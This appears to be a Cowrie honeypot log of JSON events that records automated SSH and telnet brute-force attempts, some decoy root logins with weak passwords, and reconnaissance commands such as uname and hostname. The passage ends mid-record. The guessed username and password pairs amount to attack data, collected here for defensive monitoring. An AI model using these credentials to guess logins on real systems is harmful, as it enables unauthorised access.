{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.967564Z","src_ip":"212.227.235.229","session":"30c879cc54c8"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:09:03.974183Z","src_ip":"212.227.125.160","session":"06fb84e5f306"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:04.084824Z","src_ip":"212.227.125.160","session":"5eb6f3c6128b"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:04.401417Z","src_ip":"212.227.235.229","session":"30c879cc54c8"}
{"eventid":"cowrie.login.failed","username":"user","password":"mandy","message":"login attempt [user/mandy] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:04.501605Z","src_ip":"212.227.125.160","session":"06fb84e5f306"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:05.192014Z","src_ip":"212.227.125.160","session":"5eb6f3c6128b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:05.546976Z","src_ip":"212.227.235.229","session":"30c879cc54c8"}
{"eventid":"cowrie.login.failed","username":"user","password":"labrador","message":"login attempt [user/labrador] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:05.957338Z","src_ip":"212.227.125.160","session":"06fb84e5f306"}
{"eventid":"cowrie.login.failed","username":"user","password":"kisses","message":"login attempt [user/kisses] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:07.070977Z","src_ip":"212.227.125.160","session":"06fb84e5f306"}
{"eventid":"cowrie.login.failed","username":"user","password":"katrin","message":"login attempt [user/katrin] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:08.185162Z","src_ip":"212.227.125.160","session":"06fb84e5f306"}
{"eventid":"cowrie.login.failed","username":"user","password":"kasper","message":"login attempt [user/kasper] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:09.298861Z","src_ip":"212.227.125.160","session":"06fb84e5f306"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47942,"dst_ip":"1.2.3.4","dst_port":23,"session":"80a585d9434e","protocol":"telnet","message":"New connection: 212.227.235.229:47942 (1.2.3.4:23) [session: 80a585d9434e]","sensor":"my-vps","timestamp":"2025-08-28T06:09:10.250940Z"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:10.413598Z","src_ip":"212.227.125.160","session":"06fb84e5f306"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59900,"dst_ip":"1.2.3.4","dst_port":22,"session":"02fead8353b6","protocol":"ssh","message":"New connection: 212.227.125.160:59900 (1.2.3.4:22) [session: 02fead8353b6]","sensor":"my-vps","timestamp":"2025-08-28T06:09:12.366286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:12.366965Z","src_ip":"212.227.125.160","session":"02fead8353b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:12.472176Z","src_ip":"212.227.125.160","session":"02fead8353b6"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:09:12.891783Z","src_ip":"212.227.125.160","session":"02fead8353b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:09:13.185890Z","src_ip":"212.227.125.160","session":"02fead8353b6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:09:13.186652Z","src_ip":"212.227.125.160","session":"02fead8353b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:13.292705Z","src_ip":"212.227.125.160","session":"02fead8353b6"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:13.294034Z","src_ip":"212.227.125.160","session":"02fead8353b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49377,"dst_ip":"1.2.3.4","dst_port":23,"session":"be55e330e3ea","protocol":"telnet","message":"New connection: 212.227.235.229:49377 (1.2.3.4:23) [session: be55e330e3ea]","sensor":"my-vps","timestamp":"2025-08-28T06:09:20.504061Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41688,"dst_ip":"1.2.3.4","dst_port":22,"session":"58e0c83a7da1","protocol":"ssh","message":"New connection: 212.227.235.229:41688 (1.2.3.4:22) [session: 58e0c83a7da1]","sensor":"my-vps","timestamp":"2025-08-28T06:09:21.585476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:21.586241Z","src_ip":"212.227.235.229","session":"58e0c83a7da1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:21.731216Z","src_ip":"212.227.235.229","session":"58e0c83a7da1"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:09:22.174968Z","src_ip":"212.227.235.229","session":"58e0c83a7da1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:09:22.484708Z","src_ip":"212.227.235.229","session":"58e0c83a7da1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:09:22.485440Z","src_ip":"212.227.235.229","session":"58e0c83a7da1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:22.632058Z","src_ip":"212.227.235.229","session":"58e0c83a7da1"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:22.633116Z","src_ip":"212.227.235.229","session":"58e0c83a7da1"}
{"eventid":"cowrie.session.closed","duration":33.21563386917114,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:24.289612Z","src_ip":"8.222.212.69","session":"6abe95105861"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38820,"dst_ip":"1.2.3.4","dst_port":22,"session":"490bdcf1c246","protocol":"ssh","message":"New connection: 212.227.125.160:38820 (1.2.3.4:22) [session: 490bdcf1c246]","sensor":"my-vps","timestamp":"2025-08-28T06:09:27.213790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:27.219578Z","src_ip":"212.227.125.160","session":"490bdcf1c246"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:27.317602Z","src_ip":"212.227.125.160","session":"490bdcf1c246"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53443,"dst_ip":"1.2.3.4","dst_port":22,"session":"28426b05d294","protocol":"ssh","message":"New connection: 212.227.235.229:53443 (1.2.3.4:22) [session: 28426b05d294]","sensor":"my-vps","timestamp":"2025-08-28T06:09:27.416389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:27.418309Z","src_ip":"212.227.235.229","session":"28426b05d294"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:27.866352Z","src_ip":"212.227.125.160","session":"490bdcf1c246"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:28.023924Z","src_ip":"212.227.235.229","session":"28426b05d294"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:28.972358Z","src_ip":"212.227.125.160","session":"490bdcf1c246"}
{"eventid":"cowrie.login.success","username":"root","password":"0896871270","message":"login attempt [root/0896871270] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:09:32.382395Z","src_ip":"212.227.235.229","session":"28426b05d294"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38952,"dst_ip":"1.2.3.4","dst_port":22,"session":"2aed33e179ef","protocol":"ssh","message":"New connection: 212.227.235.229:38952 (1.2.3.4:22) [session: 2aed33e179ef]","sensor":"my-vps","timestamp":"2025-08-28T06:09:33.493865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:33.494532Z","src_ip":"212.227.235.229","session":"2aed33e179ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:33.638834Z","src_ip":"212.227.235.229","session":"2aed33e179ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:09:33.761988Z","src_ip":"212.227.235.229","session":"28426b05d294"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T06:09:33.763023Z","src_ip":"212.227.235.229","session":"28426b05d294"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:34.073911Z","src_ip":"212.227.235.229","session":"2aed33e179ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:34.364253Z","src_ip":"212.227.235.229","session":"28426b05d294"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:34.721269Z","src_ip":"212.227.235.229","session":"28426b05d294"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:35.220634Z","src_ip":"212.227.235.229","session":"2aed33e179ef"}
{"eventid":"cowrie.session.closed","duration":31.664891719818115,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:41.915752Z","src_ip":"212.227.235.229","session":"80a585d9434e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40682,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d7d7388f35a","protocol":"ssh","message":"New connection: 212.227.125.160:40682 (1.2.3.4:22) [session: 6d7d7388f35a]","sensor":"my-vps","timestamp":"2025-08-28T06:09:44.015124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:44.015992Z","src_ip":"212.227.125.160","session":"6d7d7388f35a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:09:44.120744Z","src_ip":"212.227.125.160","session":"6d7d7388f35a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:09:44.438747Z","src_ip":"212.227.125.160","session":"6d7d7388f35a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:09:45.545675Z","src_ip":"212.227.125.160","session":"6d7d7388f35a"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":53746,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcc745572a89","protocol":"telnet","message":"New connection: 8.222.212.69:53746 (1.2.3.4:23) [session: dcc745572a89]","sensor":"my-vps","timestamp":"2025-08-28T06:09:48.082500Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36432,"dst_ip":"1.2.3.4","dst_port":22,"session":"2560a8b827f1","protocol":"ssh","message":"New connection: 212.227.235.229:36432 (1.2.3.4:22) [session: 2560a8b827f1]","sensor":"my-vps","timestamp":"2025-08-28T06:09:48.321476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:09:48.325879Z","src_ip":"212.227.235.229","session":"2560a8b827f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-